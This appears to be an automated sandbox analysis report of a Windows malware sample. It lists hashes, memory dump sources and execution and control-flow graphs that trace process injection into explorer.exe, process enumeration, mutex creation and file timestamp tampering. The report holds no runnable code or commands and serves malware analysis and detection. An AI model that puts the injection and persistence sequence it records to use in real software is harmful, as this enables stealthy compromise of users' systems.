                                                                                                                                                                                                              • Opcode Fuzzy Hash: fbcf8db84f0bcb0a2d0b0e49b2c778a116fa09cd0714ede85e20fc239748f007
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8F044B6204205EBDB006E959C51FAE3768AB44725F344133F612790F1C67D8A52F71B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: c7860815ad4231e939db7468cf30c1f9d63862ef5de29645b67a78e94f400ad0
                                                                                                                                                                                                              • Instruction ID: 407047d8813846ed623c6620c5c661c30d6a874651c06bbb2e7ade0d14a7dce7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c7860815ad4231e939db7468cf30c1f9d63862ef5de29645b67a78e94f400ad0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92117D2020C541FCD321D27CCA0C911BFA99B4F72075401FBD691250C3DAB9094AEBAB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 62f82913357ed83049cd1887261115a72de1e32be9748c9b7b11558f6f6d0137
                                                                                                                                                                                                              • Instruction ID: 5db6927ec116302fd1a3f9be718c7712ee400501de5b38768fcc91fc62191cbb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62f82913357ed83049cd1887261115a72de1e32be9748c9b7b11558f6f6d0137
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56117D2024C581ECD321D37CCA48914BFA69B4F72076801FBD691694C3CAB9454AEBAB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 039acd9b67e764601ba82469f9de9df4a99d24579219de54cf11ac1d4119bc91
                                                                                                                                                                                                              • Instruction ID: 863a443b315763638c31dffea77139fa9fc7248c2f9879795720f54bbf800da4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 039acd9b67e764601ba82469f9de9df4a99d24579219de54cf11ac1d4119bc91
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F115C2020C941ADD321D37CCA08914BFA59B4F72075802FBD6915A0C6CA79454AEF97
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 3e540363add078f276303d02989b505c159875bf8d0edc9c9c36215123116058
                                                                                                                                                                                                              • Instruction ID: 0c8bb5551e2abd97a64ae9c19d193427848800bdc9eaee9e975189e24a5225cd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e540363add078f276303d02989b505c159875bf8d0edc9c9c36215123116058
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56112C2020C581EDD321D27CCA09514BF959B4F72475801FBD691690C6DA79454AEB9B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 25919fc75364af992eb4b4042875d07686e0c12065a18c89e44093fc2b7c95b2
                                                                                                                                                                                                              • Instruction ID: f976abf0b506ce6ff8f37bbd7c8af7624669eab2ab4b5b0fb9c0d747e7254d45
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 25919fc75364af992eb4b4042875d07686e0c12065a18c89e44093fc2b7c95b2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1601472124C991BCE331E33CC908904BFE69B4FB6475802FAD2A15A0C7DA214589DFE7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: f4027c6423f46035466e643bdd863a4de9ba613b5b2dc0b913ca9580a9ba2c0d
                                                                                                                                                                                                              • Instruction ID: c5c43ab6752ee8d18fcb74b59ff98ad39f6596117cd62c5b2c77ced72334e6aa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f4027c6423f46035466e643bdd863a4de9ba613b5b2dc0b913ca9580a9ba2c0d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B111E2321002609FDF21AF24C49569AFBB2FF4530C375A188C9969B111E722AD8FCB91
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 79cd9034bfff8985795d7f01a2b5bacfc6e9aaff332886851db4d16c3fecaafc
                                                                                                                                                                                                              • Instruction ID: 20a1f56e34deb81daffe23ddf7f3a634b4938193a6ef7f98b4fa68dc7b801d93
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 79cd9034bfff8985795d7f01a2b5bacfc6e9aaff332886851db4d16c3fecaafc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09F078B2A04347EBD715AAF482844AEBB20A740731BA4265BD5E6E62E1D779C504D704
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 1e7a0acffb87ace860446896612c735c16b272113d31e621940bc7827f3f290d
                                                                                                                                                                                                              • Instruction ID: c48700b05c06e988df87cd580ca5e4308363d13747befdac9a33251d9afddee9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e7a0acffb87ace860446896612c735c16b272113d31e621940bc7827f3f290d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8EF0227101036187CF18AB389498198BBA1EE46668798079EDDA2770D2E327A4A9CB90

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:59.4%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                              Signature Coverage:10.6%
                                                                                                                                                                                                              Total number of Nodes:142
                                                                                                                                                                                                              Total number of Limit Nodes:6
                                                                                                                                                                                                              execution_graph 1134 1211958 1137 1211980 1134->1137 1147 12119d0 1137->1147 1140 1211973 1141 121199b SleepEx 1141->1141 1142 12119ab 1141->1142 1153 12121c4 1142->1153 1149 1211a07 1147->1149 1148 1211992 1148->1140 1148->1141 1149->1148 1150 1211ad0 RtlCreateHeap 1149->1150 1151 1211b01 1150->1151 1151->1148 1152 1211c80 CreateThread CloseHandle CreateThread 1151->1152 1152->1148 1171 1213cd0 1152->1171 1174 1213bf4 1152->1174 1154 12121e2 1153->1154 1182 1214a40 1154->1182 1156 12119c0 1157 1211d8c 1156->1157 1188 1214c90 1157->1188 1159 1211dc7 1160 1211df8 CreateMutexExA 1159->1160 1161 1211e12 1160->1161 1192 1214e00 1161->1192 1163 1211e51 1197 1211f04 1163->1197 1168 1211ebe 1169 1211ee9 SleepEx 1168->1169 1209 121226c 1168->1209 1215 1212cd0 1168->1215 1169->1168 1169->1169 1172 1213ce2 EnumWindows SleepEx 1171->1172 1173 1213d06 1171->1173 1172->1172 1172->1173 1175 1213c11 CreateToolhelp32Snapshot 1174->1175 1176 1213cab 1174->1176 1177 1213c93 SleepEx 1175->1177 1178 1213c25 Process32First 1175->1178 1177->1175 1177->1176 1180 1213c3d 1178->1180 1179 1213c8a CloseHandle 1179->1177 1180->1179 1181 1213c78 Process32Next 1180->1181 1181->1180 1183 1214a69 1182->1183 1184 1214a7d GetTokenInformation 1183->1184 1187 1214ada 1183->1187 1185 1214aa8 1184->1185 1186 1214ab2 GetTokenInformation 1185->1186 1186->1187 1187->1156 1189 1214cbd GetVolumeInformationA 1188->1189 1191 1214d10 1189->1191 1191->1159 1193 1214e22 1192->1193 1195 1214e63 RegQueryValueExA 1193->1195 1196 1214eb6 1193->1196 1194 1214ede ObtainUserAgentString 1194->1163 1195->1193 1196->1194 1199 1211f27 1197->1199 1198 1211e7d CreateFileMappingA 1198->1168 1199->1198 1200 121203e 1199->1200 1201 1211f8b DeleteFileW CopyFileW 1199->1201 1223 1213490 1200->1223 1201->1198 1202 1211fab DeleteFileW 1201->1202 1205 1211fc1 1202->1205 1204 121205b CreateFileW 1204->1198 1206 1211ff6 DeleteFileW 1205->1206 1207 121200a 1206->1207 1229 1214920 1207->1229 1210 121229d 1209->1210 1236 12132ec CreateFileW 1210->1236 1212 12122b2 1240 121230c 1212->1240 1214 12122c3 1214->1168 1216 12132ec 2 API calls 1215->1216 1217 1212cf3 1216->1217 1218 1212f55 1217->1218 1219 1212f34 SleepEx 1217->1219 1222 1212efa ResumeThread 1217->1222 1278 1214578 1217->1278 1282 1212fac 1217->1282 1218->1168 1219->1217 1219->1218 1222->1217 1224 12134b1 1223->1224 1225 12134d1 GetUserNameW 1224->1225 1226 12134f2 1225->1226 1234 12135e8 CoCreateInstance 1226->1234 1228 121350d 1228->1204 1230 1214947 1229->1230 1231 1214967 SetFileAttributesW CreateFileW 1230->1231 1232 12149b2 SetFileTime 1231->1232 1233 12149d3 1232->1233 1233->1200 1235 1213646 1234->1235 1237 1213341 1236->1237 1239 121338f 1236->1239 1238 1213360 ReadFile 1237->1238 1237->1239 1238->1239 1239->1212 1264 1213de0 1240->1264 1242 12126b8 1242->1214 1243 12125b8 1246 12126f9 1243->1246 1254 1212657 1243->1254 1260 12125d0 1243->1260 1244 121279d 1245 1213de0 RtlReAllocateHeap 1244->1245 1249 12127c4 1245->1249 1247 1213de0 RtlReAllocateHeap 1246->1247 1251 1212720 1247->1251 1248 121235f 1248->1242 1250 12124df DeleteFileW CreateFileW 1248->1250 1253 1212594 1248->1253 1249->1242 1252 1212840 RtlReAllocateHeap 1249->1252 1250->1253 1257 1212522 1250->1257 1251->1242 1256 1212840 RtlReAllocateHeap 1251->1256 1252->1242 1253->1243 1253->1244 1254->1242 1258 1213de0 RtlReAllocateHeap 1254->1258 1255 1213de0 RtlReAllocateHeap 1255->1260 1256->1242 1259 121255b WriteFile 1257->1259 1258->1242 1262 1212582 1259->1262 1260->1242 1260->1254 1260->1255 1268 1212840 1260->1268 1263 1214920 3 API calls 1262->1263 1263->1253 1265 1213e0f 1264->1265 1274 1213f7c 1265->1274 1267 1213f2f 1267->1248 1269 1212849 1268->1269 1271 1212c63 1268->1271 1270 1213f7c RtlReAllocateHeap 1269->1270 1273 1212948 1269->1273 1270->1273 1271->1260 1272 1213de0 RtlReAllocateHeap 1272->1271 1273->1271 1273->1272 1276 1213fc6 1274->1276 1277 1213fbf 1274->1277 1275 12142af RtlReAllocateHeap 1275->1276 1276->1275 1276->1277 1279 12145a8 1278->1279 1280 121461c CreateProcessInternalW 1279->1280 1281 121466f 1280->1281 1281->1217 1283 1212fe3 1282->1283 1296 12132ae 1283->1296 1301 1214760 1283->1301 1286 1214760 NtCreateSection 1287 121305b 1286->1287 1288 1214760 NtCreateSection 1287->1288 1287->1296 1289 121308a 1288->1289 1290 1214760 NtCreateSection 1289->1290 1291 12130da 1290->1291 1292 12131b8 NtQueryInformationProcess 1291->1292 1293 1213198 NtQueryInformationProcess 1291->1293 1294 12131df 1292->1294 1293->1294 1295 12131e7 ReadProcessMemory 1294->1295 1294->1296 1305 1215328 1295->1305 1298 1213212 ReadProcessMemory 1299 1213236 1298->1299 1300 121329f WriteProcessMemory 1299->1300 1300->1296 1302 1214793 1301->1302 1303 121302b 1301->1303 1302->1303 1304 12147b1 NtCreateSection 1302->1304 1303->1286 1304->1303

                                                                                                                                                                                                              Callgraph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              • Opacity -> Relevance
                                                                                                                                                                                                              • Disassembly available
                                                                                                                                                                                                              callgraph 0 Function_01213D20 6 Function_012150B0 0->6 23 Function_01214714 0->23 60 Function_012153D8 0->60 1 Function_012146A0 1->23 2 Function_01214920 4 Function_01215328 2->4 53 Function_012152CC 2->53 3 Function_01216229 5 Function_01212FAC 5->4 24 Function_01213A94 5->24 28 Function_01214760 5->28 29 Function_01214860 5->29 51 Function_01214FC8 5->51 5->53 7 Function_012153B0 8 Function_012148B0 16 Function_01215384 8->16 9 Function_01214434 10 Function_01211938 11 Function_01211501 12 Function_01214E00 25 Function_01214F1C 12->25 12->53 62 Function_012150DC 12->62 13 Function_01211980 19 Function_01211D8C 13->19 50 Function_012121C4 13->50 55 Function_012119D0 13->55 14 Function_01211803 15 Function_01211F04 15->2 15->4 20 Function_01214D8C 15->20 22 Function_01213490 15->22 15->25 15->53 17 Function_01211D08 26 Function_01214B1C 17->26 18 Function_0121230C 18->1 18->2 18->25 27 Function_01213DE0 18->27 33 Function_01215368 18->33 48 Function_01212840 18->48 18->51 52 Function_01215348 18->52 18->53 18->62 19->4 19->7 19->12 19->15 21 Function_01214C90 19->21 19->25 36 Function_0121226C 19->36 40 Function_01215274 19->40 19->53 57 Function_01212CD0 19->57 20->4 20->51 21->4 21->25 38 Function_01215174 21->38 21->53 22->4 32 Function_012135E8 22->32 22->53 54 Function_0121354C 22->54 25->4 25->51 26->6 31 Function_01214BE4 26->31 27->4 27->8 27->16 43 Function_01213F7C 27->43 27->53 28->60 30 Function_01211062 32->25 32->53 34 Function_012132EC 34->4 34->25 34->51 34->53 35 Function_012117EC 36->18 36->34 36->53 37 Function_01211175 39 Function_01213BF4 39->6 39->23 41 Function_012113F4 42 Function_01214578 42->4 42->25 42->53 43->4 43->9 43->16 43->25 43->33 43->40 47 Function_012143C0 43->47 43->51 43->53 44 Function_0121177C 45 Function_012149FC 46 Function_01214A40 46->4 46->53 46->60 47->4 47->16 48->4 48->25 48->27 48->43 48->51 48->52 48->53 48->62 63 Function_012139DC 48->63 49 Function_01211045 50->46 54->4 54->25 54->53 55->17 55->25 55->26 55->39 55->53 56 Function_01213CD0 55->56 57->4 57->5 57->20 57->34 57->42 57->51 57->53 58 Function_012111D4 58->41 59 Function_01211456 61 Function_01211958 61->13 63->24 63->52

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 01214760: NtCreateSection.NTDLL ref: 012147D2
                                                                                                                                                                                                              • NtQueryInformationProcess.NTDLL ref: 012131A2
                                                                                                                                                                                                              • NtQueryInformationProcess.NTDLL ref: 012131CA
                                                                                                                                                                                                              • ReadProcessMemory.KERNEL32 ref: 012131FD
                                                                                                                                                                                                              • ReadProcessMemory.KERNEL32 ref: 0121322B
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32 ref: 012132A8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_1211000_explorer.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$Memory$InformationQueryRead$CreateSectionWrite
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1349948393-0
                                                                                                                                                                                                              • Opcode ID: 506be8b745c86868212e6bbe2b973f53b88258c17a25ff51727040f97eaf2374
                                                                                                                                                                                                              • Instruction ID: ca1a9a5a5c3ed870babc41f38936812b288ab4525c2b7edd205cf77b810b71d8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 506be8b745c86868212e6bbe2b973f53b88258c17a25ff51727040f97eaf2374
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6B16331A18A4D9FDB18EF58D4456E9B7F2FBA8310F10427ED84AE3245DB70E90687C5

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 142 1213bf4-1213c0b 143 1213c11-1213c23 CreateToolhelp32Snapshot 142->143 144 1213cab-1213cc4 142->144 145 1213c93-1213ca5 SleepEx 143->145 146 1213c25-1213c3b Process32First 143->146 145->143 145->144 147 1213c86-1213c88 146->147 148 1213c8a-1213c8d CloseHandle 147->148 149 1213c3d-1213c54 call 12150b0 147->149 148->145 152 1213c56-1213c58 149->152 153 1213c5a-1213c68 152->153 154 1213c6c-1213c73 call 1214714 152->154 153->152 155 1213c6a 153->155 157 1213c78-1213c80 Process32Next 154->157 155->157 157->147
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_1211000_explorer.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2482764027-0
                                                                                                                                                                                                              • Opcode ID: fa5a43c44172bddb499ae6b439e922885960bdcd79c62b2d5fce3e2e85a2ac8a
                                                                                                                                                                                                              • Instruction ID: 5251276a52cf2d1506424855efdec6ccf25c8505c5078e96ea5c689262ed6488
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa5a43c44172bddb499ae6b439e922885960bdcd79c62b2d5fce3e2e85a2ac8a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6721E730124A098FEB18EF68C4887AA77D2FBA8325F04067ED54FDA149DB3495458751

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 264 1214760-121478d 265 1214793-12147ab call 12153d8 264->265 266 121483b-121483c 264->266 270 12147b1-12147db NtCreateSection 265->270 271 1214832-1214835 265->271 267 121483e-1214857 266->267 272 1214825-1214827 270->272 273 12147dd-12147df 270->273 274 1214837-1214838 271->274 275 1214829-1214830 271->275 272->274 272->275 273->274 276 12147e1-12147e5 273->276 274->266 277 12147e7-121481d 275->277 276->277 277->274 279 121481f-1214823 277->279 279->267
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_1211000_explorer.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateSection
                                                                                                                                                                                                              • String ID: @$@
                                                                                                                                                                                                              • API String ID: 2449625523-149943524
                                                                                                                                                                                                              • Opcode ID: 7986f009ac0f096a0d93092820368ebc118aed73d931aaf233c3ded0dfe06134
                                                                                                                                                                                                              • Instruction ID: d33aa9147c84222dd28bd4ca71562c525a7864831df5cc20e1aeb99ecccb6eb2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7986f009ac0f096a0d93092820368ebc118aed73d931aaf233c3ded0dfe06134
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C318F70918B898FCB94EF5CC88566AB7E0FB68315F11066FE95EE3255DB70D840CB81

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 535 12135e8-1213640 CoCreateInstance 536 12139b7-12139d3 535->536 537 1213646-121369a 535->537 539 12136a0-12136bd 537->539 540 12139ac-12139b2 537->540 539->540 542 12136c3-12136df 539->542 540->536 544 12139a1-12139a7 542->544 545 12136e5-12136fb 542->545 544->540 545->544 547 1213701-1213770 545->547 555 1213994-121399c 547->555 556 1213776-121378c 547->556 555->544 558 1213792-12137ac 556->558 559 1213839-121385f 556->559 558->559 562 12137b2-1213834 call 1214f1c * 2 call 12152cc * 2 558->562 564 1213861-1213880 559->564 565 121389e-12138ef 559->565 562->559 564->565 571 1213882-121388b 564->571 582 12138f5-1213973 565->582 583 121397f-121398f 565->583 574 1213893-1213899 571->574 574->565 582->583 583->555
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_1211000_explorer.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateInstance
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 542301482-0
                                                                                                                                                                                                              • Opcode ID: 96b0b93c05fdbe8b2e5bbbd88126f48c7d73587df48daa94093f37bd97c0f1d0
                                                                                                                                                                                                              • Instruction ID: c7dd2149c9475c3f00a7e52e87a14c5c1e5421348273ae2b51233692cdf7a2bf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 96b0b93c05fdbe8b2e5bbbd88126f48c7d73587df48daa94093f37bd97c0f1d0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CBE1EA34618A4C8FCF94EF28C895EA9B7F2FFA9304F114659E44ACB265DB70E944CB41
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetUserNameW.ADVAPI32 ref: 012134E4
                                                                                                                                                                                                                • Part of subcall function 012135E8: CoCreateInstance.COMBASE ref: 01213635
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_1211000_explorer.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateInstanceNameUser
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3213660374-0
                                                                                                                                                                                                              • Opcode ID: 637ff5e754ff5e0219c9842562421e928cab8e2f9afbdf4f7e30de780da3cdf4
                                                                                                                                                                                                              • Instruction ID: 63c7713e606f9b1fa1784acf0256e23011aca2d0bd698ac91103fbd8cbeb2f82
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 637ff5e754ff5e0219c9842562421e928cab8e2f9afbdf4f7e30de780da3cdf4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E111C31728B4D4FCB94EF6C90587AEB6D2FBEC210F504A6EA84DC3259DA7489458781

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_1211000_explorer.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Create$Thread$CloseHandleHeap
                                                                                                                                                                                                              • String ID: %g?$iP+
                                                                                                                                                                                                              • API String ID: 371905858-765743493
                                                                                                                                                                                                              • Opcode ID: 3a851293479e68066eaafbed160898214f53ca0f4bace3036e73d3865d9ba842
                                                                                                                                                                                                              • Instruction ID: b511e1a1db244a738ba75616a5bed0664d19cc97758a6ba495dee57a52d7db2c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a851293479e68066eaafbed160898214f53ca0f4bace3036e73d3865d9ba842
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB91C830628E0A8FDF54FF28D8816A577D6FBB8300B48017D9E4ECB15AEA34D551CB92

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DeleteFileW.KERNEL32 ref: 01211F8E
                                                                                                                                                                                                              • CopyFileW.KERNEL32 ref: 01211F9D
                                                                                                                                                                                                              • DeleteFileW.KERNEL32 ref: 01211FAE
                                                                                                                                                                                                              • DeleteFileW.KERNEL32 ref: 01211FF9
                                                                                                                                                                                                                • Part of subcall function 01214920: SetFileAttributesW.KERNEL32 ref: 0121496F
                                                                                                                                                                                                                • Part of subcall function 01214920: CreateFileW.KERNEL32 ref: 01214999
                                                                                                                                                                                                                • Part of subcall function 01214920: SetFileTime.KERNEL32 ref: 012149C4
                                                                                                                                                                                                              • CreateFileW.KERNEL32 ref: 01212085
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_1211000_explorer.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Delete$Create$AttributesCopyTime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 642576546-0
                                                                                                                                                                                                              • Opcode ID: 2c993fa891f39b9d933a597d97ba76a6aba4de2b2223c2145dea24c63e54199f
                                                                                                                                                                                                              • Instruction ID: 43d289bce99a2dde7ef61f6b3982809f4aaf84b50d7e091f6134a70a23dc7c73
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c993fa891f39b9d933a597d97ba76a6aba4de2b2223c2145dea24c63e54199f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A413C20728A4D4FDBA8EFAC945836E75D2EBE8610F50457EA90EC3389DE349D068781

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
